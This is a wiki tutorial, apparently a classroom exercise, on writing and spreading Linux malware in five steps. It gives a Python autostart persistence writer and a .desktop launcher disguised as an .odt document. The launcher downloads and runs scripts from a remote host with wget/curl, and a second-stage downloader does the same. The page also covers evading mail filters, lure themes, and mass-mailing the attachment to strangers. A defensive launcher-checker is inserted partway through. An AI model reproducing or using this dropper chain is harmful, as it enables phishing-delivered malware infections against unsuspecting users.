Writing a malicious program (malware) on Linux

From wikijoan

How to write a Linux virus in 5 easy steps:


Step 1

Write a piece of malware of your choice. Maybe as a Python script? Good language, efficient code, pre-installed in most Linux distros and powerful standard library support (for example, libraries for sending HTTP requests and handling SMTP are part of most standard installs). Place that malware on some web-server.

We will write the malicious program in bash, in the file molt_important.sh:

#!/bin/bash
# demo payload: open gedit five times
for i in {1..5}
do
   echo "Welcome gedit $i times"
   gedit --new-window &
done

# infinite loop (alternative payload, left commented out)
# for (( ; ; ))
# do
#   echo "infinite loops [ hit CTRL+C to stop]"
# done

$ sudo chmod a+x molt_important.sh
$ ./molt_important.sh

and it is available at http://wiki.joanillo.org/molt_important.sh

Step 2

Your malware needs the ability to install a launcher for itself so that it is started whenever the user logs in. As mentioned, for Gnome that means creating a launcher description in the ~/.config/autostart folder. For KDE just link to your executable from within the ~/.kde/Autostart directory. To do that the malware code can either just force the issue and copy a launcher or link to itself into both locations (creating any directories along the way if they don't exist) or it can be a bit smarter and choose the right thing to do based on the desktop environment that it detects.

For Gnome the Python script instead needs to write a launcher into the proper directory:


import os

# launcher that re-runs the script at every login (autostart entry)
relauncher_str = """
[Desktop Entry]
Exec=bash ~/.local/.hidden/molt_important.sh
"""
uname = os.getlogin()
drop_dir = "/home/%s/.config/autostart" % uname
f = open(drop_dir + "/Malware.desktop", "w")
f.write(relauncher_str)
f.close()

If we run this script ($ python crear_llencadora.py) we will see the file /home/joan/.config/autostart/Malware.desktop being created, which means that every time we boot the machine the script /home/joan/molt_important.sh will be executed. Do this to check that the crear_llencadora.py script works correctly, but then delete the file /home/joan/.config/autostart/Malware.desktop, since the goal is for it to be created when you run an attachment that you will receive by mail.

Writing these autostart entries is probably some of the first action that your malware should perform.

The content of the Malware.desktop file must be:

[Desktop Entry]
Exec=bash /home/joan/molt_important.sh

Step 3

Now create a desktop launcher file for the installer of the malware, which is different than the launcher we use to restart the malware after a reboot. The desktop launcher for the installer is what we send as attachment in the email to the targeted user. It's what the user clicks on after they saved it. Try something like this. File llegeix_molt_important.odt.desktop:

#!/usr/bin/env xdg-open

[Desktop Entry]
Exec=bash -c 'URL=http://wiki.joanillo.org/molt_important.sh ; URL2=http://wiki.joanillo.org/crear_llencadora.py ; DROP=~/.local/.hidden ; mkdir -p $DROP ; if [ -e /usr/bin/wget ] ; then wget --no-cache $URL -O $DROP/molt_important.sh ; wget --no-cache $URL2 -O $DROP/crear_llencadora.py ; else curl $URL -o $DROP/molt_important.sh ; curl $URL2 -o $DROP/crear_llencadora.py ; fi ; chmod a+x $DROP/molt_important.sh ; chmod a+x $DROP/crear_llencadora.py ; python $DROP/crear_llencadora.py ; bash $DROP/molt_important.sh'
Comment=Llegeix molt important

Important: we have to give our file execute permission. Gmail (and other mail providers) blocks the sending of executable files, even when they are wrapped in a zip. In fact it does let them through, but it strips the execute permission flag. What worked for the teacher was:

  • give the file llegir_molt_important.odt.desktop execute permission
  • compress it as a .tar.gz
  • send it by gmail to the recipient
  • the recipient unpacks it and sees that it is an odt (with the corresponding icon), harmless at first sight. They double-click and, since the execute flag has been preserved, the script runs.

Note that we have specified a name that is harmless looking and even chose an icon that makes it look like a normal document (that particular icon is present on both Ubuntu (Gnome) and Kubuntu (KDE) systems, but annoyingly not on Fedora). If you claim to send nude shots in the email, just give it a name that makes it sound like an image (something with .jpg at the end) and chose one of the appropriate standard image icons.

The Exec line is a bit longer now, because we have to account for the possibility that either wget is installed or curl. For example, Ubuntu systems usually have wget, while Fedora comes with curl. So, we pass the appropriate commands to bash in order to check which one is present and then call the correct command to download the malware. I'm not a bash expert, so there might be a much more efficient way to do this. But you get the idea. Also, in that line we are creating a good location for the script ($DROP), which is not immediately obvious. The mkdir command with the -p option will silently create whatever parent directories are necessary. The target directory is in the user's home, hidden away in some innocent looking local directory and can only be seen when also displaying hidden files. The /tmp directory of course is not a good place for our malware, since it is wiped with each reboot.

Save this launcher file under the name you specified with the Name line, but add '.desktop' to the end of the actual file name. So, in our case, you would save the file as 'some_text.odt.desktop'. When you place this on your desktop you will see that Gnome or KDE will treat it in a special way, not displaying the '.desktop' extension. So, the file just appears as 'some_text.odt'. Of course, that also means that the mail attachment will have this extension as well. Some users may notice, many others will not.



A shorter variant of the installer launcher, which downloads only a second-stage script, molt_important2.sh, that in turn fetches the rest:

#!/usr/bin/env xdg-open

[Desktop Entry]
Exec=bash -c 'URL=http://wiki.joanillo.org/molt_important2.sh ; DROP=~/.local/.hidden ; mkdir -p $DROP ; if [ -e /usr/bin/wget ] ; then wget --no-cache $URL -O $DROP/molt_important2.sh ; else curl $URL -o $DROP/molt_important2.sh ; fi ; chmod a+x $DROP/molt_important2.sh ; bash $DROP/molt_important2.sh'
Comment=Llegeix molt important

molt_important2.sh (it is on the remote server):

#!/bin/bash
# second stage: fetch the payload and the autostart writer (values as in the launcher above)
URL=http://wiki.joanillo.org/molt_important.sh
URL2=http://wiki.joanillo.org/crear_llencadora.py
DROP=~/.local/.hidden
mkdir -p $DROP
if [ -e /usr/bin/wget ] ; then
        wget --no-cache $URL -O $DROP/molt_important.sh
        wget --no-cache $URL2 -O $DROP/crear_llencadora.py
else
        curl $URL -o $DROP/molt_important.sh
        curl $URL2 -o $DROP/crear_llencadora.py
fi
chmod a+x $DROP/molt_important.sh
chmod a+x $DROP/crear_llencadora.py
python $DROP/crear_llencadora.py
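As an added example from the defender's side (not code from this page or its author), here is a Python checker that parses .desktop launchers and flags the indicators that Steps 2 and 3 rely on: a document-like name placed in front of the .desktop extension, an Exec line that runs an inline shell command or downloads with wget/curl, a path into a hidden directory, and a launcher lacking the Type/Name keys a normal application entry has. The sample launchers and the example.invalid URL are constructed; scan_autostart() reads the real ~/.config/autostart and ~/.kde/Autostart directories named above.

```python
import os
import re

# Constructed samples (not files from the page's server): the mailed installer,
# the autostart re-launcher described above, and a benign launcher for contrast.
SAMPLES = {
    "llegeix_molt_important.odt.desktop": (
        "[Desktop Entry]\n"
        "Exec=bash -c 'URL=http://example.invalid/molt_important.sh; DROP=~/.local/.hidden; "
        "mkdir -p $DROP; wget --no-cache $URL -O $DROP/molt_important.sh; bash $DROP/molt_important.sh'\n"
        "Comment=Llegeix molt important\n"),
    "Malware.desktop": "[Desktop Entry]\nExec=bash ~/.local/.hidden/molt_important.sh\n",
    "firefox.desktop": "[Desktop Entry]\nType=Application\nName=Firefox\nExec=firefox %u\n",
}

DISGUISE = re.compile(r"\.(odt|ods|doc|docx|pdf|txt|jpe?g|png)\.desktop$", re.I)
HIDDEN_PATH = re.compile(r"(^|[\s=/~])\.[^./\s][^/\s]*/")  # e.g. ~/.local/.hidden/

def exec_line(text):
    # value of the Exec= key, or '' if the launcher has none
    for line in text.splitlines():
        if line.startswith("Exec="):
            return line[len("Exec="):].strip()
    return ""

def analyse_launcher(name, text):
    # returns the list of indicators found in one .desktop launcher
    reasons, cmd = [], exec_line(text)
    if DISGUISE.search(name):
        reasons.append("document-like name hides the .desktop extension")
    if re.search(r"\b(ba)?sh\s+-c\b", cmd):
        reasons.append("Exec runs an inline shell command")
    if re.search(r"\b(wget|curl)\b", cmd):
        reasons.append("Exec downloads from the network")
    if HIDDEN_PATH.search(cmd):
        reasons.append("Exec references a hidden directory")
    if "Type=" not in text or "Name=" not in text:
        reasons.append("launcher lacks the Type/Name keys a normal entry has")
    return reasons

def scan_autostart(home=None):
    # audits the two per-user autostart directories named on this page
    findings = {}
    for d in (".config/autostart", ".kde/Autostart"):
        path = os.path.join(home or os.path.expanduser("~"), d)
        for fn in (os.listdir(path) if os.path.isdir(path) else []):
            if fn.endswith(".desktop"):
                with open(os.path.join(path, fn)) as fh:
                    findings[os.path.join(path, fn)] = analyse_launcher(fn, fh.read())
    return findings
```

Run analyse_launcher(name, SAMPLES[name]) on the constructed samples to see the installer launcher trip all five checks, the re-launcher two, and the Firefox entry none; scan_autostart() returns the same per-file lists for the launchers actually present in your own autostart directories.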

Step 4

Attach this file to an email, which prompts the recipient to save and open the attachment. As explained, once it has been saved it will just appear as molt_important.odt on the user's desktop. And with the icon we have chosen in the launcher description it will look quite harmless.

Step 5

Send this email out to as many email addresses as you can get a hold of.


Submit to Moodle the documentation you generated, together with a README file containing your notes.

created by Joan Quintana Compte, November 2011